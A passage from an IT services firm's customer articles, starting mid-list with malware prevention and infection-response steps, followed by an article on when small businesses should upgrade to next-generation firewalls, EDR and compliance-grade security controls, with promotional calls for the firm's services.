  6. Educate users. Phishing simulations, safe‑browsing habits, and a “don’t open unknown attachments” policy reduce the human attack surface.
  7. Limit user privileges. Run daily work as a standard user; reserve admin rights for IT staff only.
  8. Use email and web filtering solutions. They block known malicious links, attachments, and exploit kits before they reach the endpoint.
  9. Deploy endpoint detection & response (EDR) for real‑time monitoring of suspicious behavior, especially to catch file‑less attacks.
  10. Monitor network traffic. Intrusion detection/prevention systems (IDS/IPS) and DNS‑filtering services (e.g., Quad9, Cloudflare DNS‑SEC) add another layer of defense.

What to Do If You Suspect an Infection

  1. Disconnect from the network. Disable Wi‑Fi/Ethernet to stop further spread.
  2. Update your AV/EDR definitions and run a full system scan (not just a quick/real‑time scan).
  3. Follow the remediation steps provided by the security tool (quarantine, delete, or repair).
  4. Reboot in Safe Mode (Windows) or Recovery mode (macOS) if the malware persists.
  5. Change passwords on a clean device, especially for email, banking, and any admin accounts.
  6. Restore from a verified backup if files were encrypted or corrupted.
  7. Contact a professional if you cannot fully remove the infection or if ransomware demands payment. Paying does not guarantee decryption and often fuels the criminal ecosystem.

Next Up

In the next article we’ll dive into “How Antivirus and Antispyware Work” and what to look for when choosing a solution.

Need Assistance?

If you suspect your computer is infected or you want a professional assessment of your security posture, call PSA Computer Services at (707) 506‑6802. We’ll help you clean the infection, harden your defenses, and get you back to work safely.

When to Upgrade Your Security – Four Key Considerations

Article (PSA‑0002‑C)

Below is a plain‑language breakdown of the four situations that typically justify moving beyond a basic home‑router firewall to a more capable solution such as a commercial next‑generation firewall (NGFW), unified‑threat‑management platform, or a managed security service.


1️⃣ You run a small business with multiple endpoints and need centralized management

  • What it means – You have 5 – 20 devices (PCs, laptops, printers, VoIP phones, servers) spread across one or more locations.
  • Why a basic firewall falls short – Each device must be configured manually, creating a high risk of “policy drift” where some machines stay open to the Internet.
  • What you need from a new solution
    • A single management console (cloud‑based or on‑prem) that can push policies, updates, and patches to every endpoint.
    • Policy templates that apply the same rule set to all devices automatically.
    • Device‑aware logging that ties every event to a hostname, MAC address, or user for easy forensics.

2️⃣ Ransomware or phishing attacks are a frequent threat in your industry

  • What it means – Malicious PDFs, Office documents, or links that deliver ransomware; fake login pages that harvest credentials.
  • Why a simple firewall can’t stop it – Basic NAT/firewall only looks at IP/port; it can’t inspect file payloads or block a phishing URL that resolves correctly.
  • What you need from a more robust platform
    • Content‑inspection and sandboxing – unknown files are executed in a safe VM before delivery.
    • URL and web‑reputation filtering to block known phishing domains in real time.
    • Network segmentation/micro‑segmentation so an infected workstation can’t reach every other device.
    • EDR integration to stop ransomware processes on the endpoint and auto‑rollback changes.

3️⃣ You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs

  • What it means
    • Allow Zoom video but block Zoom file‑sharing.
    • Detect and block known exploit attempts (e.g., EternalBlue).
    • Provide encrypted, MFA‑protected VPN tunnels for remote staff.
  • Why standard NAT routers can’t deliver
    • Home routers only see TCP/UDP ports – they can’t differentiate between applications that share the same port.
    • No built‑in IDS/IPS signatures, so exploits go unnoticed.
    • VPN support is often old PPTP/L2TP and lacks MFA or split‑tunnel control.
  • What a modern NGFW (or complementary appliance) offers
    • App‑ID/DPI – precise, per‑application policies (allow, limit, or block).
    • Signature‑based IPS plus behavioral analytics for zero‑day protection.
    • Modern SSL/TLS or IPsec VPN with MFA, client certificates, and detailed session logging.
    • Optional ZTNA layer for identity‑based, context‑aware access.

4️⃣ You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls

  • HIPAA – audit logs, encryption, role‑based access for ePHI
    • How a basic firewall fails: No immutable logs, no enforced TLS for internal traffic, no RBAC for rule changes.
    • Required capabilities:
      • Detailed, tamper‑proof audit logging (forwarded to a SIEM or immutable storage).
      • TLS/SSL inspection and encryption enforcement for any traffic containing PHI.
      • RBAC so only authorized staff can modify firewall policies.
  • PCI‑DSS – segmentation, IDS/IPS, strict firewall configuration
    • How a basic firewall fails: No VLAN‑based segmentation, no IDS/IPS, and no change‑management logs.
    • Required capabilities:
      • Network segmentation (separate CHD zone) with firewall rules that isolate card‑holder data.
      • Built‑in IDS/IPS to detect attacks against payment‑card servers.
      • Change‑management logging for every rule alteration.
  • GDPR – data‑loss prevention, breach‑notification readiness, encryption
    • How a basic firewall fails: No outbound data‑filtering, no guaranteed encryption, limited visibility for breach forensics.
    • Required capabilities:
      • DLP or outbound filtering to prevent accidental export of personal data.
      • Enforced TLS for all traffic that could carry EU personal data.
      • Comprehensive logging to meet the 72‑hour breach‑notification window.

How to Act on These Considerations

  • Multiple devices? Deploy a centralized endpoint‑protection platform (e.g., Microsoft Defender for Endpoint, Bitdefender GravityZone) and pair it with a lightweight NGFW (FortiGate 60F, Palo Alto PA‑220).
  • Ransomware/phishing frequent? Add sandboxing, URL filtering, and network segmentation; enable EDR on all endpoints.
  • Need app‑aware control, IDS/IPS, VPN? Choose an NGFW that bundles those services or combine a dedicated VPN concentrator with a separate IDS/IPS sensor.
  • Regulatory compliance required? Verify the firewall is certified for PCI‑DSS/HIPAA, enable immutable logging, TLS inspection, and RBAC. Consider a managed security service that handles audit‑ready reporting.

Need a Tailored Recommendation?

If any of the four triggers above sound familiar, it’s time to move beyond a consumer‑grade router. PSA Computer Services can evaluate your environment, recommend a solution that fits your budget, and handle the deployment so you can focus on your business.

Call us today at (707) 506‑6802 for an assessment and a roadmap to a more secure network.